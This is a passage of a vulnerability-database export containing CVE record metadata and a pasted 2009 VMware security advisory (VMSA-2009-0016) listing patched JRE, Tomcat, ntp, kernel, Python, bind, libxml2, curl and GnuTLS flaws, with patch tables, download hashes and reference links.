        "url": "https://launchpad.net/ubuntu/+source/linux-aws-5.0/5.0.0-1024.27~18.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19079"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/4258-1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oracle-5.0/5.0.0-1010.15~18.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gcp/5.0.0-1029.30~18.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gke-5.0/5.0.0-1029.30~18.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/4254-2"
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2019-18683"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-011718"
      },
      {
        "db": "PACKETSTORM",
        "id": "156110"
      },
      {
        "db": "PACKETSTORM",
        "id": "155890"
      },
      {
        "db": "PACKETSTORM",
        "id": "156422"
      },
      {
        "db": "PACKETSTORM",
        "id": "156427"
      },
      {
        "db": "PACKETSTORM",
        "id": "156418"
      },
      {
        "db": "PACKETSTORM",
        "id": "156125"
      },
      {
        "db": "PACKETSTORM",
        "id": "156124"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201911-066"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-18683"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULMON",
        "id": "CVE-2019-18683"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-011718"
      },
      {
        "db": "PACKETSTORM",
        "id": "156110"
      },
      {
        "db": "PACKETSTORM",
        "id": "155890"
      },
      {
        "db": "PACKETSTORM",
        "id": "156422"
      },
      {
        "db": "PACKETSTORM",
        "id": "156427"
      },
      {
        "db": "PACKETSTORM",
        "id": "156418"
      },
      {
        "db": "PACKETSTORM",
        "id": "156125"
      },
      {
        "db": "PACKETSTORM",
        "id": "156124"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201911-066"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-18683"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2019-11-04T00:00:00",
        "db": "VULMON",
        "id": "CVE-2019-18683"
      },
      {
        "date": "2019-11-15T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2019-011718"
      },
      {
        "date": "2020-01-28T15:44:44",
        "db": "PACKETSTORM",
        "id": "156110"
      },
      {
        "date": "2020-01-09T15:06:22",
        "db": "PACKETSTORM",
        "id": "155890"
      },
      {
        "date": "2020-02-19T15:27:54",
        "db": "PACKETSTORM",
        "id": "156422"
      },
      {
        "date": "2020-02-19T15:35:02",
        "db": "PACKETSTORM",
        "id": "156427"
      },
      {
        "date": "2020-02-19T15:25:33",
        "db": "PACKETSTORM",
        "id": "156418"
      },
      {
        "date": "2020-01-29T17:15:10",
        "db": "PACKETSTORM",
        "id": "156125"
      },
      {
        "date": "2020-01-29T17:15:05",
        "db": "PACKETSTORM",
        "id": "156124"
      },
      {
        "date": "2019-11-04T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201911-066"
      },
      {
        "date": "2019-11-04T16:15:11.327000",
        "db": "NVD",
        "id": "CVE-2019-18683"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2023-11-07T00:00:00",
        "db": "VULMON",
        "id": "CVE-2019-18683"
      },
      {
        "date": "2019-11-15T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2019-011718"
      },
      {
        "date": "2022-04-19T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201911-066"
      },
      {
        "date": "2024-06-07T13:55:43.110000",
        "db": "NVD",
        "id": "CVE-2019-18683"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "local",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "156110"
      },
      {
        "db": "PACKETSTORM",
        "id": "156422"
      },
      {
        "db": "PACKETSTORM",
        "id": "156427"
      },
      {
        "db": "PACKETSTORM",
        "id": "156418"
      },
      {
        "db": "PACKETSTORM",
        "id": "156124"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201911-066"
      }
    ],
    "trust": 1.1
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Linux Kernel Race condition vulnerability",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-011718"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "resource management error",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201911-066"
      }
    ],
    "trust": 0.6
  }
}

var-200906-0598
Vulnerability from variot

Integer underflow in the e1000_clean_rx_irq function in drivers/net/e1000/e1000_main.c in the e1000 driver in the Linux kernel before 2.6.30-rc8, the e1000e driver in the Linux kernel, and Intel Wired Ethernet (aka e1000) before 7.5.5 allows remote attackers to cause a denial of service (panic) via a crafted frame size. (DoS) There is a vulnerability that becomes a condition.Denial of service due to crafted frame size (DoS) There is a possibility of being put into a state. The NFSv4 implementation is one of the distributed file system protocols. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1


               VMware Security Advisory

Advisory ID: VMSA-2009-0016 Synopsis: VMware vCenter and ESX update release and vMA patch release address multiple security issue in third party components Issue date: 2009-11-20 Updated on: 2009-11-20 (initial release of advisory) CVE numbers: --- JRE --- CVE-2009-1093 CVE-2009-1094 CVE-2009-1095 CVE-2009-1096 CVE-2009-1097 CVE-2009-1098 CVE-2009-1099 CVE-2009-1100 CVE-2009-1101 CVE-2009-1102 CVE-2009-1103 CVE-2009-1104 CVE-2009-1105 CVE-2009-1106 CVE-2009-1107 CVE-2009-2625 CVE-2009-2670 CVE-2009-2671 CVE-2009-2672 CVE-2009-2673 CVE-2009-2675 CVE-2009-2676 CVE-2009-2716 CVE-2009-2718 CVE-2009-2719 CVE-2009-2720 CVE-2009-2721 CVE-2009-2722 CVE-2009-2723 CVE-2009-2724 --- Tomcat --- CVE-2008-5515 CVE-2009-0033 CVE-2009-0580 CVE-2009-0781 CVE-2009-0783 CVE-2008-1232 CVE-2008-1947 CVE-2008-2370 CVE-2007-5333 CVE-2007-5342 CVE-2007-5461 CVE-2007-6286 CVE-2008-0002 --- ntp --- CVE-2009-1252 CVE-2009-0159 --- kernel --- CVE-2008-3528 CVE-2008-5700 CVE-2009-0028 CVE-2009-0269 CVE-2009-0322 CVE-2009-0675 CVE-2009-0676 CVE-2009-0778 CVE-2008-4307 CVE-2009-0834 CVE-2009-1337 CVE-2009-0787 CVE-2009-1336 CVE-2009-1439 CVE-2009-1633 CVE-2009-1072 CVE-2009-1630 CVE-2009-1192 CVE-2007-5966 CVE-2009-1385 CVE-2009-1388 CVE-2009-1389 CVE-2009-1895 CVE-2009-2406 CVE-2009-2407 CVE-2009-2692 CVE-2009-2698 CVE-2009-0745 CVE-2009-0746 CVE-2009-0747 CVE-2009-0748 CVE-2009-2847 CVE-2009-2848 --- python --- CVE-2007-2052 CVE-2007-4965 CVE-2008-1721 CVE-2008-1887 CVE-2008-2315 CVE-2008-3142 CVE-2008-3143 CVE-2008-3144 CVE-2008-4864 CVE-2008-5031 --- bind --- CVE-2009-0696 --- libxml and libxml2 --- CVE-2009-2414 CVE-2009-2416 --- curl -- CVE-2009-2417 --- gnutil --- CVE-2007-2052


  1. Summary

Updated Java JRE packages and Tomcat packages address several security issues. Updates for the ESX Service Console and vMA include kernel, ntp, Python, bind libxml, libxml2, curl and gnutil packages. ntp is also updated for ESXi userworlds.

  1. Relevant releases

vCenter Server 4.0 before Update 1

ESXi 4.0 without patch ESXi400-200911201-UG

ESX 4.0 without patches ESX400-200911201-UG, ESX400-200911223-UG, ESX400-200911232-SG, ESX400-200911233-SG, ESX400-200911234-SG, ESX400-200911235-SG, ESX400-200911237-SG, ESX400-200911238-SG

vMA 4.0 before patch 02

  1. Problem Description

a. JRE Security Update

JRE update to version 1.5.0_20, which addresses multiple security
issues that existed in earlier releases of JRE.

The Common Vulnerabilities and Exposures project (cve.mitre.org) has
assigned the following names to the security issues fixed in
JRE 1.5.0_18: CVE-2009-1093, CVE-2009-1094, CVE-2009-1095,
CVE-2009-1096, CVE-2009-1097, CVE-2009-1098, CVE-2009-1099,
CVE-2009-1100, CVE-2009-1101, CVE-2009-1102, CVE-2009-1103,
CVE-2009-1104, CVE-2009-1105, CVE-2009-1106, and CVE-2009-1107.

The Common Vulnerabilities and Exposures project (cve.mitre.org) has
assigned the following names to the security issues fixed in
JRE 1.5.0_20: CVE-2009-2625, CVE-2009-2670, CVE-2009-2671,
CVE-2009-2672, CVE-2009-2673, CVE-2009-2675, CVE-2009-2676,
CVE-2009-2716, CVE-2009-2718, CVE-2009-2719, CVE-2009-2720,
CVE-2009-2721, CVE-2009-2722, CVE-2009-2723, CVE-2009-2724.

The following table lists what action remediates the vulnerability
(column 4) if a solution is available.

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =================
vCenter        4.0       Windows  Update 1
VirtualCenter  2.5       Windows  affected, patch pending
VirtualCenter  2.0.2     Windows  affected, patch pending

Workstation    any       any      not affected

Player         any       any      not affected

Server         2.0       any      affected, patch pending
Server         1.0       any      not affected

ACE            any       any      not affected

Fusion         any       any      not affected

ESXi           any       ESXi     not affected

ESX            4.0       ESX      ESX400-200911223-UG
ESX            3.5       ESX      affected, patch pending
ESX            3.0.3     ESX      affected, patch pending
ESX            2.5.5     ESX      not affected

vMA            4.0       RHEL5    Patch 2 *
  • vMA JRE is updated to version JRE 1.5.0_21

    Notes: These vulnerabilities can be exploited remotely only if the attacker has access to the Service Console network.

       Security best practices provided by VMware recommend that the
       Service Console be isolated from the VM network. Please see
       http://www.vmware.com/resources/techresources/726 for more
       information on VMware security best practices.
    
       The currently installed version of JRE depends on your patch
       deployment history.
    

b. Update Apache Tomcat version to 6.0.20

Update for VirtualCenter and ESX patch update the Tomcat package to version 6.0.20 which addresses multiple security issues that existed in the previous version of Apache Tomcat.

The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the following names to the security issues fixed in Apache Tomcat 6.0.20: CVE-2008-5515, CVE-2009-0033, CVE-2009-0580, CVE-2009-0781, CVE-2009-0783.

The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the following names to the security issues fixed in Apache Tomcat 6.0.18: CVE-2008-1232, CVE-2008-1947, CVE-2008-2370.

The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the following names to the security issues fixed in Apache Tomcat 6.0.16: CVE-2007-5333, CVE-2007-5342, CVE-2007-5461, CVE-2007-6286, CVE-2008-0002.

The following table lists what action remediates the vulnerability (column 4) if a solution is available.

VMware Product Running Replace with/ Product Version on Apply Patch ======== ======== ======= ======================= vCenter 4.0 Windows Update 1 VirtualCenter 2.5 Windows affected, patch pending VirtualCenter 2.0.2 Windows affected, patch pending

Workstation any any not affected

Player any any not affected

ACE any Windows not affected

Server 2.x any affected, patch pending Server 1.x any not affected

Fusion any Mac OS/X not affected

ESXi any ESXi not affected

ESX 4.0 ESX ESX400-200911223-UG ESX 3.5 ESX affected, patch pending ESX 3.0.3 ESX affected, patch pending ESX 2.5.5 ESX not affected

vMA 4.0 RHEL5 not affected

Notes: These vulnerabilities can be exploited remotely only if the
       attacker has access to the Service Console network.

       Security best practices provided by VMware recommend that the
       Service Console be isolated from the VM network. Please see
       http://www.vmware.com/resources/techresources/726 for more
       information on VMware security best practices.

       The currently installed version of Tomcat depends on
       your patch deployment history.

c. Third party library update for ntp.

The Network Time Protocol (NTP) is used to synchronize a computer's time with a referenced time source.

ESXi 3.5 and ESXi 4.0 have a ntp client that is affected by the following security issue. Note that the same security issue is present in the ESX Service Console as described in section d. of this advisory.

A buffer overflow flaw was discovered in the ntpd daemon's NTPv4 authentication code. If ntpd was configured to use public key cryptography for NTP packet authentication, a remote attacker could use this flaw to send a specially-crafted request packet that could crash ntpd or, potentially, execute arbitrary code with the privileges of the "ntp" user.

The Common Vulnerabilities and Exposures Project (cve.mitre.org) has assigned the name CVE-2009-1252 to this issue.

The NTP security issue identified by CVE-2009-0159 is not relevant for ESXi 3.5 and ESXi 4.0.

The following table lists what action remediates the vulnerability in this component (column 4) if a solution is available.

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =================
vCenter        any       Windows  not affected

hosted *       any       any      not affected

ESXi           4.0       ESXi     ESXi400-200911201-UG
ESXi           3.5       ESXi     affected, patch pending

ESX            4.0       ESX      not affected
ESX            3.5       ESX      not affected
ESX            3.0.3     ESX      not affected
ESX            2.5.5     ESX      not affected

vMA            4.0       RHEL5    not affected
  • hosted products are VMware Workstation, Player, ACE, Server, Fusion.

d. Service Console update for ntp

Service Console package ntp updated to version ntp-4.2.2pl-9.el5_3.2

The Network Time Protocol (NTP) is used to synchronize a computer's time with a referenced time source.

The Service Console present in ESX is affected by the following security issues.

A buffer overflow flaw was discovered in the ntpd daemon's NTPv4 authentication code. If ntpd was configured to use public key cryptography for NTP packet authentication, a remote attacker could use this flaw to send a specially-crafted request packet that could crash ntpd or, potentially, execute arbitrary code with the privileges of the "ntp" user.

NTP authentication is not enabled by default on the Service Console.

The Common Vulnerabilities and Exposures Project (cve.mitre.org) has assigned the name CVE-2009-1252 to this issue.

A buffer overflow flaw was found in the ntpq diagnostic command. A malicious, remote server could send a specially-crafted reply to an ntpq request that could crash ntpq or, potentially, execute arbitrary code with the privileges of the user running the ntpq command.

The Common Vulnerabilities and Exposures Project (cve.mitre.org) has assigned the name CVE-2009-0159 to this issue.

The following table lists what action remediates the vulnerability in the Service Console (column 4) if a solution is available.

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =================
vCenter        any       Windows  not affected

hosted *       any       any      not affected

ESXi           any       ESXi     not affected

ESX            4.0       ESX      ESX400-200911238-SG
ESX            3.5       ESX      affected, patch pending **
ESX            3.0.3     ESX      affected, patch pending **
ESX            2.5.5     ESX      affected, patch pending **

vMA            4.0       RHEL5    Patch 2
  • hosted products are VMware Workstation, Player, ACE, Server, Fusion.

** The service consoles of ESX 2.5.5, ESX 3.0.3 and ESX 3.5 are not affected by CVE-2009-1252. The security issue identified by CVE-2009-0159 has a low impact on the service console of ESX 2.5.5, ESX 3.0.3 and ESX 3.5.

e. Updated Service Console package kernel

Updated Service Console package kernel addresses the security
issues below.

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the names CVE-2008-3528, CVE-2008-5700, CVE-2009-0028,
CVE-2009-0269, CVE-2009-0322, CVE-2009-0675, CVE-2009-0676,
CVE-2009-0778 to the security issues fixed in kernel
2.6.18-128.1.6.

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the names CVE-2008-4307, CVE-2009-0834, CVE-2009-1337,
CVE-2009-0787, CVE-2009-1336 to the security issues fixed in
kernel 2.6.18-128.1.10.

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the names CVE-2009-1439, CVE-2009-1633, CVE-2009-1072,
CVE-2009-1630, CVE-2009-1192 to the security issues fixed in
kernel 2.6.18-128.1.14.

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the names CVE-2007-5966, CVE-2009-1385, CVE-2009-1388,
CVE-2009-1389, CVE-2009-1895, CVE-2009-2406, CVE-2009-2407 to the
security issues fixed in kernel 2.6.18-128.4.1.

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the names CVE-2009-2692, CVE-2009-2698 to the
security issues fixed in kernel 2.6.18-128.7.1.

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the names CVE-2009-0745, CVE-2009-0746, CVE-2009-0747,
CVE-2009-0748, CVE-2009-2847, CVE-2009-2848 to the security issues
fixed in kernel 2.6.18-164.

The following table lists what action remediates the vulnerability
(column 4) if a solution is available.

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =================
vCenter        any       Windows  not applicable

hosted *       any       any      not applicable

ESXi           any       ESXi     not applicable

ESX            4.0       ESX      ESX400-200911201-UG
ESX            3.5       ESX      not applicable
ESX            3.0.3     ESX      not applicable
ESX            2.5.5     ESX      not applicable

vMA            4.0       RHEL5    Patch 2 **
  • hosted products are VMware Workstation, Player, ACE, Server, Fusion.

** vMA is updated to kernel version 2.6.18-164.

f. Updated Service Console package python

Service Console package Python update to version 2.4.3-24.el5.

When the assert() system call was disabled, an input sanitization
flaw was revealed in the Python string object implementation that
led to a buffer overflow. The missing check for negative size values
meant the Python memory allocator could allocate less memory than
expected. This could result in arbitrary code execution with the
Python interpreter's privileges.

Multiple buffer and integer overflow flaws were found in the Python
Unicode string processing and in the Python Unicode and string
object implementations. An attacker could use these flaws to cause
a denial of service.

Multiple integer overflow flaws were found in the Python imageop
module. If a Python application used the imageop module to
process untrusted images, it could cause the application to
disclose sensitive information, crash or, potentially, execute
arbitrary code with the Python interpreter's privileges.

Multiple integer underflow and overflow flaws were found in the
Python snprintf() wrapper implementation. An attacker could use
these flaws to cause a denial of service (memory corruption).

Multiple integer overflow flaws were found in various Python
modules. An attacker could use these flaws to cause a denial of
service.

An integer signedness error, leading to a buffer overflow, was
found in the Python zlib extension module. If a Python application
requested the negative byte count be flushed for a decompression
stream, it could cause the application to crash or, potentially,
execute arbitrary code with the Python interpreter's privileges.

A flaw was discovered in the strxfrm() function of the Python
locale module. Strings generated by this function were not properly
NULL-terminated, which could possibly cause disclosure of data
stored in the memory of a Python application using this function.

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the names CVE-2007-2052 CVE-2007-4965 CVE-2008-1721
CVE-2008-1887 CVE-2008-2315 CVE-2008-3142 CVE-2008-3143
CVE-2008-3144 CVE-2008-4864 CVE-2008-5031 to these issues.

The following table lists what action remediates the vulnerability
(column 4) if a solution is available.

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =================
vCenter        any       Windows  not applicable

hosted *       any       any      not applicable

ESXi           any       ESXi     not applicable

ESX            4.0       ESX      ESX400-200911235-SG
ESX            3.5       ESX      affected, patch pending
ESX            3.0.3     ESX      affected, patch pending
ESX            2.5.5     ESX      affected, patch pending

vMA            4.0       RHEL5    Patch 2
  • hosted products are VMware Workstation, Player, ACE, Server, Fusion.

g. Updated Service Console package bind

Service Console package bind updated to version 9.3.6-4.P1.el5

The Berkeley Internet Name Domain (BIND) is an implementation of the
Domain Name System (DNS) protocols. BIND includes a DNS server
(named); a resolver library (routines for applications to use when
interfacing with DNS); and tools for verifying that the DNS server
is operating correctly.

A flaw was found in the way BIND handles dynamic update message
packets containing the "ANY" record type. A remote attacker could
use this flaw to send a specially-crafted dynamic update packet
that could cause named to exit with an assertion failure.

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the name CVE-2009-0696 to this issue.

The following table lists what action remediates the vulnerability
(column 4) if a solution is available.

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =================
vCenter        any       Windows  not applicable

hosted *       any       any      not applicable

ESXi           any       ESXi     not applicable

ESX            4.0       ESX      ESX400-200911237-SG
ESX            3.5       ESX      affected, patch pending
ESX            3.0.3     ESX      affected, patch pending
ESX            2.5.5     ESX      affected, patch pending

vMA            4.0       RHEL5    Patch 2
  • hosted products are VMware Workstation, Player, ACE, Server, Fusion.

h. Updated Service Console package libxml2

Service Console package libxml2 updated to version 2.6.26-2.1.2.8.

libxml is a library for parsing and manipulating XML files. A
Document Type Definition (DTD) defines the legal syntax (and also
which elements can be used) for certain types of files, such as XML
files.

A stack overflow flaw was found in the way libxml processes the
root XML document element definition in a DTD. A remote attacker
could provide a specially-crafted XML file, which once opened by a
local, unsuspecting user, would lead to denial of service.

Multiple use-after-free flaws were found in the way libxml parses
the Notation and Enumeration attribute types. A remote attacker
could provide a specially-crafted XML file, which once opened by a
local, unsuspecting user, would lead to denial of service.

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the names CVE-2009-2414 and CVE-2009-2416 to these
issues.

The following table lists what action remediates the vulnerability
(column 4) if a solution is available.

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =================
vCenter        any       Windows  not applicable

hosted *       any       any      not applicable

ESXi           any       ESXi     not applicable

ESX            4.0       ESX      ESX400-200911234-SG
ESX            3.5       ESX      affected, patch pending
ESX            3.0.3     ESX      affected, patch pending
ESX            2.5.5     ESX      affected, patch pending

vMA            4.0       RHEL5    Patch 2
  • hosted products are VMware Workstation, Player, ACE, Server, Fusion.

i. Updated Service Console package curl

Service Console package curl updated to version 7.15.5-2.1.el5_3.5

A cURL is affected by the previously published "null prefix attack",
caused by incorrect handling of NULL characters in X.509
certificates. If an attacker is able to get a carefully-crafted
certificate signed by a trusted Certificate Authority, the attacker
could use the certificate during a man-in-the-middle attack and
potentially confuse cURL into accepting it by mistake.

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the name CVE-2009-2417 to this issue

The following table lists what action remediates the vulnerability
(column 4) if a solution is available.

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =================
vCenter        any       Windows  not applicable

hosted *       any       any      not applicable

ESXi           any       ESXi     not applicable

ESX            4.0       ESX      ESX400-200911232-SG
ESX            3.5       ESX      not affected
ESX            3.0.3     ESX      not affected
ESX            2.5.5     ESX      not affected

vMA            4.0       RHEL5    Patch 2
  • hosted products are VMware Workstation, Player, ACE, Server, Fusion.

j. Updated Service Console package gnutls

Service Console package gnutil updated to version 1.4.1-3.el5_3.5

A flaw was discovered in the way GnuTLS handles NULL characters in
certain fields of X.509 certificates. If an attacker is able to get
a carefully-crafted certificate signed by a Certificate Authority
trusted by an application using GnuTLS, the attacker could use the
certificate during a man-in-the-middle attack and potentially
confuse the application into accepting it by mistake.

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the name CVE-2009-2730 to this issue

The following table lists what action remediates the vulnerability
(column 4) if a solution is available.

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =================
vCenter        any       Windows  not applicable

hosted *       any       any      not applicable

ESXi           any       ESXi     not applicable

ESX            4.0       ESX      ESX400-200911233-SG
ESX            3.5       ESX      not affected
ESX            3.0.3     ESX      not affected
ESX            2.5.5     ESX      not affected

vMA            4.0       RHEL5    Patch 2
  • hosted products are VMware Workstation, Player, ACE, Server, Fusion.

  • Solution

Please review the patch/release notes for your product and version and verify the md5sum of your downloaded file.

VMware vCenter Server 4 Update 1


Version 4.0 Update 1 Build Number 208156 Release Date 2009/11/19 Type Product Binaries http://downloads.vmware.com/download/download.do?downloadGroup=VC40U1

VMware vCenter Server 4 and modules File size: 1.8 GB File type: .iso MD5SUM: 057d55b32eb27fe5f3e01bc8d3df3bc5 SHA1SUM: c90134418c2e4d3d6637d8bee44261300ad95ec1

VMware vCenter Server 4 and modules File size: 1.5 GB File type: .zip MD5SUM: f843d9c19795eb3bc5a77f5c545468a8 SHA1SUM: 9a7abd8e70bd983151e2ee40e1b3931525c4480c

VMware vSphere Client and Host Update Utility File size: 113.8 MB File type: .exe MD5SUM: 6cc6b2c958e7e9529c284e48dfae22a9 SHA1SUM: f4c19c63a75d93cffc57b170066358160788c959

VMware vCenter Converter BootCD File size: 98.8 MB File type: .zip MD5SUM: 3df94eb0e93de76b0389132ada2a3799 SHA1SUM: 5d7c04e4f9f8ae25adc8de5963fefd8a4c92464c

VMware vCenter Converter CLI (Linux) File size: 36.9 MB File type: .tar.gz MD5SUM: 3766097563936ba5e03e87e898f6bd48 SHA1SUM: 36d485bdb5eb279296ce8c8523df04bfb12a2cb4

ESXi 4.0 Update 1


ESXi400-200911201-UG

https://hostupdate.vmware.com/software/VUM/OFFLINE/release-155-20091116-013169/ESXi-4.0.0-update01.zip md5sum:c6fdd6722d9e5cacb280bdcc2cca0627 sha1sum:de9d4875f86b6493f9da991a8cff37784215db2e http://kb.vmware.com/kb/1014886

NOTE: The three ESXi patches for Firmware, VMware Tools, and the VI Client "C" are contained in a single download file.

ESX 4.0 Update 1


https://hostupdate.vmware.com/software/VUM/OFFLINE/release-158-20091118-187517/ESX-4.0.0-update01.zip md5sum: 68934321105c34dcda4cbeeab36a2b8f sha1sum: 0d8ae58cf9143d5c7113af9692dea11ed2dd864b http://kb.vmware.com/kb/1014842

To install an individual bulletin use esxupdate with the -b option. esxupdate --bundle=ESX-4.0.0-update01.zip -b ESX400-200911223-UG -b ESX400-200911238-SG -b ESX400-200911201-UG -b ESX400-200911235-SG -b ESX400-200911237-SG -b ESX400-200911234-SG -b ESX400-200911232-SG -b ESX400-200911233-SG update

  1. References

CVE numbers --- JRE --- http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1093 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1094 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1095 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1096 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1097 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1098 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1099 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1100 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1101 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1102 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1103 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1104 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1105 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1106 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1107 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2625 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2670 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2671 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2672 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2673 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2675 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2676 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2716 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2718 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2719 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2720 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2721 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2722 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2723 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2724 --- Tomcat --- http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5515 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0033 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0580 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0781 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0783 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1232 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1947 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2370 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5333 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5342 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5461 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6286 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0002 --- ntp --- http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1252 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0159 --- kernel --- http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3528 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5700 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0028 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0269 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0322 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0675 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0676 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0778 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4307 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0834 